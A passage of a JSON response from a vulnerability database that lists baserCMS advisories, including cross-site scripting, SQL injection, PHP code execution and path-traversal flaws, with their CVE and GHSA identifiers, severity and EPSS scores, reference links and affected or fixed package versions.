rw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.3.7"}],"aliases":["CVE-2020-15154","GHSA-cpxc-67rc-c775"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d5gk-q2hh-kba5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/54257?format=json","vulnerability_id":"VCID-eq7f-n3g5-s3hu","summary":"Cross-site Scripting\nImproper neutralization of JavaScript input in the page editing function of baserCMS allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-20681","reference_id":"","reference_type":"","scores":[{"value":"0.00203","scoring_system":"epss","scoring_elements":"0.42327","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00203","scoring_system":"epss","scoring_elements":"0.42402","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-20681"},{"reference_url":"https://basercms.net/security/JVN64869876","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN64869876"},{"reference_url":"https://jvn.jp/en/jp/JVN64869876/index.html","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://jvn.jp/en/jp/JVN64869876/index.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20681","reference_id":"CVE-2021-20681","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20681"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/80118?format=json","purl":"pkg:composer/baserproject/basercms@4.4.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5"}],"aliases":["CVE-2021-20681","GHSA-24p5-x9f9-vvpx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eq7f-n3g5-s3hu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38784?format=json","vulnerability_id":"VCID-ffq1-r9ck-1bhp","summary":"SQL Injection\nBaser CMS contains a SQL injection vulnerability.","references":[{"reference_url":"http://jvn.jp/en/jp/JVN78151490/index.html","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://jvn.jp/en/jp/JVN78151490/index.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-10842","reference_id":"","reference_type":"","scores":[{"value":"0.0067","scoring_system":"epss","scoring_elements":"0.7178","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0067","scoring_system":"epss","scoring_elements":"0.7174","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-10842"},{"reference_url":"https://basercms.net/security/JVN78151490","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN78151490"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-10842","reference_id":"CVE-2017-10842","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-10842"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/212595?format=json","purl":"pkg:composer/baserproject/basercms@4.0.5.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-2u6y-aj6t-7fb1"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-6trr-5deb-yydm"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-9mf7-56fh-fyfk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-d5gk-q2hh-kba5"},{"vulnerability":"VCID-e4xa-jm9u-nked"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ga9u-uv9b-tydr"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-gsg3-fdmu-vqag"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-p6nr-eu91-53b4"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-r4jc-22rq-d3cb"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-vqx2-hzju-r7et"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-yesf-qxgy-3ygx"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zy68-bur9-1fck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.5.1"},{"url":"http://public2.vulnerablecode.io/api/packages/54021?format=json","purl":"pkg:composer/baserproject/basercms@4.0.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-2u6y-aj6t-7fb1"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-6trr-5deb-yydm"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-9mf7-56fh-fyfk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-d5gk-q2hh-kba5"},{"vulnerability":"VCID-e4xa-jm9u-nked"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ga9u-uv9b-tydr"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-gsg3-fdmu-vqag"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-p6nr-eu91-53b4"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-r4jc-22rq-d3cb"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-vqx2-hzju-r7et"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-yesf-qxgy-3ygx"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zy68-bur9-1fck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.6"}],"aliases":["CVE-2017-10842","GHSA-jc94-wp59-pq4f"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ffq1-r9ck-1bhp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46297?format=json","vulnerability_id":"VCID-g56w-z9cx-5ygv","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-29009","reference_id":"","reference_type":"","scores":[{"value":"0.0055","scoring_system":"epss","scoring_elements":"0.68361","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-29009"},{"reference_url":"https://basercms.net/security/JVN_45547161","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/"}],"url":"https://basercms.net/security/JVN_45547161"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-29009","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-29009"},{"reference_url":"https://github.com/advisories/GHSA-8vqx-prq4-rqrq","reference_id":"GHSA-8vqx-prq4-rqrq","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-8vqx-prq4-rqrq"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq","reference_id":"GHSA-8vqx-prq4-rqrq","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67525?format=json","purl":"pkg:composer/baserproject/basercms@4.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0"},{"url":"http://public2.vulnerablecode.io/api/packages/685977?format=json","purl":"pkg:composer/baserproject/basercms@5.0.0-beta1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0-beta1"}],"aliases":["CVE-2023-29009","GHSA-8vqx-prq4-rqrq"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g56w-z9cx-5ygv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/47107?format=json","vulnerability_id":"VCID-ggv8-3v9t-mfea","summary":"baserCMS Cross-site Scripting vulnerability in Site search Feature\nThere is a XSS Vulnerability in Site search Feature to baserCMS.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-44379","reference_id":"","reference_type":"","scores":[{"value":"0.00622","scoring_system":"epss","scoring_elements":"0.70549","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-44379"},{"reference_url":"https://basercms.net/security/JVN_73283159","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/"}],"url":"https://basercms.net/security/JVN_73283159"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/"}],"url":"https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-44379","reference_id":"CVE-2023-44379","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-44379"},{"reference_url":"https://github.com/advisories/GHSA-66c2-p8rh-qx87","reference_id":"GHSA-66c2-p8rh-qx87","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-66c2-p8rh-qx87"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87","reference_id":"GHSA-66c2-p8rh-qx87","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/69105?format=json","purl":"pkg:composer/baserproject/basercms@5.0.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9"}],"aliases":["CVE-2023-44379","GHSA-66c2-p8rh-qx87"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ggv8-3v9t-mfea"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/40409?format=json","vulnerability_id":"VCID-gsg3-fdmu-vqag","summary":"Improper Input Validation\nbaserCMS allows remote attackers to execute arbitrary PHP code via the `admin/theme_configs/form`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-18942","reference_id":"","reference_type":"","scores":[{"value":"0.00928","scoring_system":"epss","scoring_elements":"0.76457","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00928","scoring_system":"epss","scoring_elements":"0.76486","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-18942"},{"reference_url":"https://basercms.net/release/4_1_4","reference_id":"","reference_type":"","scores":[],"url":"https://basercms.net/release/4_1_4"},{"reference_url":"https://github.com/baserproject/basercms/issues/959","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/issues/959"},{"reference_url":"https://web.archive.org/web/20200130073341/https://basercms.net/release/4_1_4","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://web.archive.org/web/20200130073341/https://basercms.net/release/4_1_4"},{"reference_url":"https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS"},{"reference_url":"https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS/","reference_id":"","reference_type":"","scores":[],"url":"https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS/"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-18942","reference_id":"CVE-2018-18942","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-18942"},{"reference_url":"https://github.com/advisories/GHSA-rjc2-x53r-6c9r","reference_id":"GHSA-rjc2-x53r-6c9r","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rjc2-x53r-6c9r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56953?format=json","purl":"pkg:composer/baserproject/basercms@4.1.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-d5gk-q2hh-kba5"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-p6nr-eu91-53b4"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-vqx2-hzju-r7et"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.4"}],"aliases":["CVE-2018-18942","GHSA-rjc2-x53r-6c9r"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gsg3-fdmu-vqag"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38783?format=json","vulnerability_id":"VCID-guvm-x5jc-mfgc","summary":"Path Traversal\nbaserCMS allows remote attackers to delete arbitrary files via unspecified vectors when the \"File\" field is being used in the mail 